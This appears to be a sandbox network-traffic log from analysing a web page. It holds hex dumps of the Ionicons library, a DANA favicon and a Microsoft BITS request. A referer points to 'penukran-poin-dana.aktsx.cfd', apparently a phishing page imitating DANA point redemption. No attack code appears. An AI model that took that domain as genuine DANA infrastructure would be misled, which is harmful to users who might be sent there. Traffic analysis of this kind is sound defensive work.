                                                                                                                            2024-10-06 11:50:08 UTC1369INData Raw: 68 69 73 2e 6d 6f 64 65 7c 7c 22 6d 64 22 2c 65 3d 74 68 69 73 2e 66 6c 69 70 52 74 6c 7c 7c 6f 26 26 28 6f 2e 69 6e 64 65 78 4f 66 28 22 61 72 72 6f 77 22 29 3e 2d 31 7c 7c 6f 2e 69 6e 64 65 78 4f 66 28 22 63 68 65 76 72 6f 6e 22 29 3e 2d 31 29 26 26 21 31 21 3d 3d 74 68 69 73 2e 66 6c 69 70 52 74 6c 3b 72 65 74 75 72 6e 20 69 28 74 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 72 6f 6c 65 3a 22 69 6d 67 22 2c 63 6c 61 73 73 3a 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 5b 72 5d 3a 21 30 7d 2c 70 28 74 68 69 73 2e 63 6f 6c 6f 72 29 29 2c 7b 5b 60 69 63 6f 6e 2d 24 7b 74 68 69 73 2e 73 69 7a 65 7d 60 5d 3a 21 21 74 68 69 73 2e 73 69 7a 65 2c 22 66 6c 69 70 2d 72 74 6c 22 3a 21 21 65 26 26 61 28 6e 29 7d 29 7d
                                                                                                                            Data Ascii: his.mode||"md",e=this.flipRtl||o&&(o.indexOf("arrow")>-1||o.indexOf("chevron")>-1)&&!1!==this.flipRtl;return i(t,Object.assign({role:"img",class:Object.assign(Object.assign({[r]:!0},p(this.color)),{[`icon-${this.size}`]:!!this.size,"flip-rtl":!!e&&a(n)})}
                                                                                                                            2024-10-06 11:50:08 UTC618INData Raw: 72 2d 73 65 63 6f 6e 64 61 72 79 29 7b 2d 2d 69 6f 6e 2d 63 6f 6c 6f 72 2d 62 61 73 65 3a 76 61 72 28 2d 2d 69 6f 6e 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 2c 20 23 30 63 64 31 65 38 29 7d 3a 68 6f 73 74 28 2e 69 6f 6e 2d 63 6f 6c 6f 72 2d 74 65 72 74 69 61 72 79 29 7b 2d 2d 69 6f 6e 2d 63 6f 6c 6f 72 2d 62 61 73 65 3a 76 61 72 28 2d 2d 69 6f 6e 2d 63 6f 6c 6f 72 2d 74 65 72 74 69 61 72 79 2c 20 23 66 34 61 39 34 32 29 7d 3a 68 6f 73 74 28 2e 69 6f 6e 2d 63 6f 6c 6f 72 2d 73 75 63 63 65 73 73 29 7b 2d 2d 69 6f 6e 2d 63 6f 6c 6f 72 2d 62 61 73 65 3a 76 61 72 28 2d 2d 69 6f 6e 2d 63 6f 6c 6f 72 2d 73 75 63 63 65 73 73 2c 20 23 31 30 64 63 36 30 29 7d 3a 68 6f 73 74 28 2e 69 6f 6e 2d 63 6f 6c 6f 72 2d 77 61 72 6e 69 6e 67 29 7b 2d 2d 69 6f 6e 2d 63
                                                                                                                            Data Ascii: r-secondary){--ion-color-base:var(--ion-color-secondary, #0cd1e8)}:host(.ion-color-tertiary){--ion-color-base:var(--ion-color-tertiary, #f4a942)}:host(.ion-color-success){--ion-color-base:var(--ion-color-success, #10dc60)}:host(.ion-color-warning){--ion-c
                                                                                                                            2024-10-06 11:50:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            23192.168.2.649755163.181.92.2284436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:09 UTC593OUTGET /favicon.ico HTTP/1.1
                                                                                                                            Host: www.dana.id
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:09 UTC1047INHTTP/1.1 200 OK
                                                                                                                            Server: Tuser
                                                                                                                            Content-Type: image/x-icon
                                                                                                                            Content-Length: 101471
                                                                                                                            Connection: close
                                                                                                                            Set-Cookie: acw_tc=a3b55c9817282154097092573e7429bbe45921927769ad9b7a38b3dae8;path=/;HttpOnly;Max-Age=3600
                                                                                                                            Set-Cookie: cdn_sec_tc=a3b55c9817282154097092573e7429bbe45921927769ad9b7a38b3dae8;path=/;HttpOnly;Max-Age=3600
                                                                                                                            Strict-Transport-Security: max-age=5184000; includeSubDomains
                                                                                                                            Date: Mon, 29 Jul 2024 04:18:15 GMT
                                                                                                                            Last-Modified: Tue, 11 Apr 2023 09:54:24 GMT
                                                                                                                            ETag: "64352e50-18c5f"
                                                                                                                            X-UA-Compatible: IE=Edge
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            Cache-Control: public, no-transform
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                            Via: cache5.l2de2[0,12,200-0,H], cache6.l2de2[14,0], ens-cache10.de5[0,0,200-0,H], ens-cache4.de5[8,0]
                                                                                                                            Age: 5988714
                                                                                                                            Ali-Swift-Global-Savetime: 1722226695
                                                                                                                            X-Cache: HIT TCP_HIT dirn:11:266810234
                                                                                                                            X-Swift-SaveTime: Tue, 06 Aug 2024 02:20:11 GMT
                                                                                                                            X-Swift-CacheTime: 7091884
                                                                                                                            Timing-Allow-Origin: *
                                                                                                                            EagleId: a3b55c9817282154097092573e
                                                                                                                            2024-10-06 11:50:09 UTC15337INData Raw: 00 00 01 00 06 00 00 00 00 00 01 00 20 00 f1 06 00 00 66 00 00 00 80 80 00 00 01 00 20 00 28 08 01 00 57 07 00 00 40 40 00 00 01 00 20 00 28 42 00 00 7f 0f 01 00 30 30 00 00 01 00 20 00 a8 25 00 00 a7 51 01 00 20 20 00 00 01 00 20 00 a8 10 00 00 4f 77 01 00 10 10 00 00 01 00 20 00 68 04 00 00 f7 87 01 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 06 b8 49 44 41 54 78 da ed dd cf eb 65 75 1d c7 f1 3b e9 44 ce 42 4e 0b 3b 39 64 4c 2e 2b 2c 7f a0 2e 84 5c 08 62 90 e4 0f 82 96 15 b5 70 55 47 5a b9 72 21 08 ca 59 b8 10 51 c4 8d 60 24 a8 0b 21 2a 88 52 0a 02 41 6a 11 41 8d 8b d2 ec 08 e2 29 24 65 62 18 ff 83 f3 1e e6 7c cf 7c ee dc d7 e3 b1 7d 9f 39 df f3 b9 33 f3 e4 03 f7 33 67 76 3b 00 00 00 00 00
                                                                                                                            Data Ascii: f (W@@ (B00 %Q Ow hPNGIHDR\rfIDATxeu;DBN;9dL.+,.\bpUGZr!YQ`$!*RAjA)$eb||}933gv;
                                                                                                                            2024-10-06 11:50:09 UTC16384INData Raw: 10 cb e9 8e 10 cb e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9
                                                                                                                            Data Ascii:
                                                                                                                            2024-10-06 11:50:09 UTC322INData Raw: 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 19 e9 8e 10 19 e9 8e 10 19 e9 8e 10 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2024-10-06 11:50:09 UTC16384INData Raw: e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 c8 e9 8e 10 c8 e9 8e 10 c8 e9 8e 10 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e9 8e 10 78 e9 8e 10 78 e9 8e 10 78 e9 8e 10 78 e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 19 e9 8e 10 19 e9 8e 10 19 e9 8e 10 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: xxxx
                                                                                                                            2024-10-06 11:50:09 UTC16384INData Raw: e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 59 e9 8e 10 59 e9 8e 10 59 e9 8e 10 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e9 8e 10 19 e9 8e 10 19 e9 8e 10 19 e9 8e 10 19 e9 8e 10 f6 e9 8e 10 f6 e9 8e 10 f6 e9 8e 10 f6 e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10
                                                                                                                            Data Ascii: YYYY
                                                                                                                            2024-10-06 11:50:09 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2024-10-06 11:50:09 UTC16384INData Raw: e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 59 e9 8e 10 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e9 8e 10 85 e9 8e 10 85 e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10
                                                                                                                            Data Ascii: YY
                                                                                                                            2024-10-06 11:50:09 UTC3892INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 e9 8e 10 2e e9 8e 10 81 e9 8e 10 c0 e9 8e 10 f6 e9 8e 10 ff e9 8e 10 ff e9 8e 10 d7 e9 8e 10 72 e9 8e 10 e0 e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e9 8e 10 1c e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e9 8e 10 05 e9 8e 10 1b e9 8e 10 0f 00 00 00 00 00 00 00 00 e9 8e 10 c8 e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e9 8e 10 5c e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 ff e9 8e 10 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: .rk\


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            24192.168.2.649754184.28.90.27443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:09 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: identity
                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                            Host: fs.microsoft.com
                                                                                                                            2024-10-06 11:50:09 UTC466INHTTP/1.1 200 OK
                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                            Content-Type: application/octet-stream
                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                            Server: ECAcc (lpl/EF17)
                                                                                                                            X-CID: 11
                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                            X-Ms-Region: prod-neu-z1
                                                                                                                            Cache-Control: public, max-age=17718
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:09 GMT
                                                                                                                            Connection: close
                                                                                                                            X-CID: 2


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            25192.168.2.649768104.17.247.2034436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:09 UTC375OUTGET /ionicons@7.1.0/dist/ionicons/p-d15ec307.js HTTP/1.1
                                                                                                                            Host: unpkg.com
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:09 UTC575INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:09 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            access-control-allow-origin: *
                                                                                                                            cache-control: public, max-age=31536000
                                                                                                                            last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                            etag: W/"21d1-dJ29Zq7KcbnJnZUTvF7HPfVtDCE"
                                                                                                                            via: 1.1 fly.io
                                                                                                                            fly-request-id: 01J8RC11KKPFR4520Q8ZKP182A-lga
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 820632
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ce56ea7ef9f0f77-EWR
                                                                                                                            2024-10-06 11:50:09 UTC794INData Raw: 32 31 64 31 0d 0a 6c 65 74 20 65 2c 74 2c 6e 3d 21 31 3b 63 6f 6e 73 74 20 6c 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 7b 7d 2c 73 3d 6c 2e 64 6f 63 75 6d 65 6e 74 7c 7c 7b 68 65 61 64 3a 7b 7d 7d 2c 6f 3d 7b 74 3a 30 2c 6c 3a 22 22 2c 6a 6d 70 3a 65 3d 3e 65 28 29 2c 72 61 66 3a 65 3d 3e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 65 29 2c 61 65 6c 3a 28 65 2c 74 2c 6e 2c 6c 29 3d 3e 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6e 2c 6c 29 2c 72 65 6c 3a 28 65 2c 74 2c 6e 2c 6c 29 3d 3e 65 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6e 2c 6c 29 2c 63 65 3a 28 65 2c 74 29 3d 3e 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 65
                                                                                                                            Data Ascii: 21d1let e,t,n=!1;const l="undefined"!=typeof window?window:{},s=l.document||{head:{}},o={t:0,l:"",jmp:e=>e(),raf:e=>requestAnimationFrame(e),ael:(e,t,n,l)=>e.addEventListener(t,n,l),rel:(e,t,n,l)=>e.removeEventListener(t,n,l),ce:(e,t)=>new CustomEvent(e
                                                                                                                            2024-10-06 11:50:09 UTC1369INData Raw: 7c 74 2e 63 6c 61 73 73 3b 65 26 26 28 74 2e 63 6c 61 73 73 3d 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 65 3f 65 3a 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2e 66 69 6c 74 65 72 28 28 74 3d 3e 65 5b 74 5d 29 29 2e 6a 6f 69 6e 28 22 20 22 29 29 7d 7d 63 6f 6e 73 74 20 75 3d 68 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 75 2e 75 3d 74 2c 63 2e 6c 65 6e 67 74 68 3e 30 26 26 28 75 2e 24 3d 63 29 2c 75 2e 68 3d 73 2c 75 7d 2c 68 3d 28 65 2c 74 29 3d 3e 28 7b 74 3a 30 2c 70 3a 65 2c 69 3a 74 2c 6d 3a 6e 75 6c 6c 2c 24 3a 6e 75 6c 6c 2c 75 3a 6e 75 6c 6c 2c 68 3a 6e 75 6c 6c 7d 29 2c 64 3d 7b 7d 2c 70 3d 28 65 2c 74 2c 6e 2c 73 2c 69 2c 63 29 3d 3e 7b 69 66 28 6e 21 3d 3d 73 29 7b 6c 65 74 20 75 3d 44 28 65 2c 74 29 2c 61 3d 74 2e 74 6f 4c 6f 77
                                                                                                                            Data Ascii: |t.class;e&&(t.class="object"!=typeof e?e:Object.keys(e).filter((t=>e[t])).join(" "))}}const u=h(e,null);return u.u=t,c.length>0&&(u.$=c),u.h=s,u},h=(e,t)=>({t:0,p:e,i:t,m:null,$:null,u:null,h:null}),d={},p=(e,t,n,s,i,c)=>{if(n!==s){let u=D(e,t),a=t.toLow
                                                                                                                            2024-10-06 11:50:09 UTC1369INData Raw: 7d 2c 67 3d 28 74 2c 6e 2c 6c 29 3d 3e 7b 63 6f 6e 73 74 20 6f 3d 6e 2e 24 5b 6c 5d 3b 6c 65 74 20 69 2c 63 2c 72 3d 30 3b 69 66 28 6e 75 6c 6c 21 3d 3d 6f 2e 69 29 69 3d 6f 2e 6d 3d 73 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 6f 2e 69 29 3b 65 6c 73 65 20 69 66 28 69 3d 6f 2e 6d 3d 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 2e 70 29 2c 62 28 6e 75 6c 6c 2c 6f 2c 21 31 29 2c 6e 75 6c 6c 21 3d 65 26 26 69 5b 22 73 2d 73 69 22 5d 21 3d 3d 65 26 26 69 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 69 5b 22 73 2d 73 69 22 5d 3d 65 29 2c 6f 2e 24 29 66 6f 72 28 72 3d 30 3b 72 3c 6f 2e 24 2e 6c 65 6e 67 74 68 3b 2b 2b 72 29 63 3d 67 28 74 2c 6f 2c 72 29 2c 63 26 26 69 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 29 3b 72 65 74 75 72 6e 20 69 7d 2c 6b
                                                                                                                            Data Ascii: },g=(t,n,l)=>{const o=n.$[l];let i,c,r=0;if(null!==o.i)i=o.m=s.createTextNode(o.i);else if(i=o.m=s.createElement(o.p),b(null,o,!1),null!=e&&i["s-si"]!==e&&i.classList.add(i["s-si"]=e),o.$)for(r=0;r<o.$.length;++r)c=g(t,o,r),c&&i.appendChild(c);return i},k
                                                                                                                            2024-10-06 11:50:09 UTC1369INData Raw: 30 2c 6c 2e 6c 65 6e 67 74 68 2d 31 29 29 3a 65 2e 69 21 3d 3d 6f 26 26 28 6e 2e 64 61 74 61 3d 6f 29 7d 2c 43 3d 65 3d 3e 7b 65 2e 75 26 26 65 2e 75 2e 72 65 66 26 26 65 2e 75 2e 72 65 66 28 6e 75 6c 6c 29 2c 65 2e 24 26 26 65 2e 24 2e 6d 61 70 28 43 29 7d 2c 4d 3d 65 3d 3e 5f 28 65 29 2e 67 2c 4f 3d 28 65 2c 74 29 3d 3e 7b 74 26 26 21 65 2e 6b 26 26 74 5b 22 73 2d 70 22 5d 26 26 74 5b 22 73 2d 70 22 5d 2e 70 75 73 68 28 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 74 3d 3e 65 2e 6b 3d 74 29 29 29 7d 2c 78 3d 28 65 2c 74 29 3d 3e 7b 69 66 28 65 2e 74 7c 3d 31 36 2c 21 28 34 26 65 2e 74 29 29 72 65 74 75 72 6e 20 4f 28 65 2c 65 2e 53 29 2c 6e 65 28 28 28 29 3d 3e 4c 28 65 2c 74 29 29 29 3b 65 2e 74 7c 3d 35 31 32 7d 2c 4c 3d 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73
                                                                                                                            Data Ascii: 0,l.length-1)):e.i!==o&&(n.data=o)},C=e=>{e.u&&e.u.ref&&e.u.ref(null),e.$&&e.$.map(C)},M=e=>_(e).g,O=(e,t)=>{t&&!e.k&&t["s-p"]&&t["s-p"].push(new Promise((t=>e.k=t)))},x=(e,t)=>{if(e.t|=16,!(4&e.t))return O(e,e.S),ne((()=>L(e,t)));e.t|=512},L=(e,t)=>{cons
                                                                                                                            2024-10-06 11:50:09 UTC1369INData Raw: 28 28 29 3d 3e 78 28 65 2c 21 31 29 29 29 2c 65 2e 74 26 3d 2d 35 31 37 7d 2c 52 3d 28 29 3d 3e 7b 57 28 73 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 2c 74 65 28 28 28 29 3d 3e 28 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 6f 2e 63 65 28 22 61 70 70 6c 6f 61 64 22 2c 7b 64 65 74 61 69 6c 3a 7b 6e 61 6d 65 73 70 61 63 65 3a 22 69 6f 6e 69 63 6f 6e 73 22 7d 7d 29 3b 72 65 74 75 72 6e 20 65 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 74 29 2c 74 7d 29 28 6c 29 29 29 7d 2c 54 3d 28 65 2c 74 2c 6e 29 3d 3e 7b 69 66 28 65 26 26 65 5b 74 5d 29 74 72 79 7b 72 65 74 75 72 6e 20 65 5b 74 5d 28 6e 29 7d 63 61 74 63 68 28 65 29 7b 47 28 65 29 7d 7d 2c 55 3d 28 65 2c 74 29 3d 3e 65 26 26 65 2e 74 68 65 6e 3f 65 2e 74 68 65 6e 28 74 29 3a 74 28 29 2c 57 3d 65 3d 3e
                                                                                                                            Data Ascii: (()=>x(e,!1))),e.t&=-517},R=()=>{W(s.documentElement),te((()=>(e=>{const t=o.ce("appload",{detail:{namespace:"ionicons"}});return e.dispatchEvent(t),t})(l)))},T=(e,t,n)=>{if(e&&e[t])try{return e[t](n)}catch(e){G(e)}},U=(e,t)=>e&&e.then?e.then(t):t(),W=e=>
                                                                                                                            2024-10-06 11:50:09 UTC1369INData Raw: 74 73 2c 75 3d 73 2e 68 65 61 64 2c 66 3d 75 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 6d 65 74 61 5b 63 68 61 72 73 65 74 5d 22 29 2c 79 3d 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 74 79 6c 65 22 29 2c 24 3d 5b 5d 3b 6c 65 74 20 68 2c 64 3d 21 30 3b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 6f 2c 74 29 2c 6f 2e 6c 3d 6e 65 77 20 55 52 4c 28 74 2e 72 65 73 6f 75 72 63 65 73 55 72 6c 7c 7c 22 2e 2f 22 2c 73 2e 62 61 73 65 55 52 49 29 2e 68 72 65 66 2c 65 2e 6d 61 70 28 28 65 3d 3e 7b 65 5b 31 5d 2e 6d 61 70 28 28 74 3d 3e 7b 63 6f 6e 73 74 20 6c 3d 7b 74 3a 74 5b 30 5d 2c 6f 3a 74 5b 31 5d 2c 4c 3a 74 5b 32 5d 2c 52 3a 74 5b 33 5d 7d 3b 6c 2e 4c 3d 74 5b 32 5d 2c 6c 2e 4d 3d 5b 5d 2c 6c 2e 50 3d 7b 7d 3b 63 6f 6e 73 74 20 73 3d 6c 2e 6f
                                                                                                                            Data Ascii: ts,u=s.head,f=u.querySelector("meta[charset]"),y=s.createElement("style"),$=[];let h,d=!0;Object.assign(o,t),o.l=new URL(t.resourcesUrl||"./",s.baseURI).href,e.map((e=>{e[1].map((t=>{const l={t:t[0],o:t[1],L:t[2],R:t[3]};l.L=t[2],l.M=[],l.P={};const s=l.o
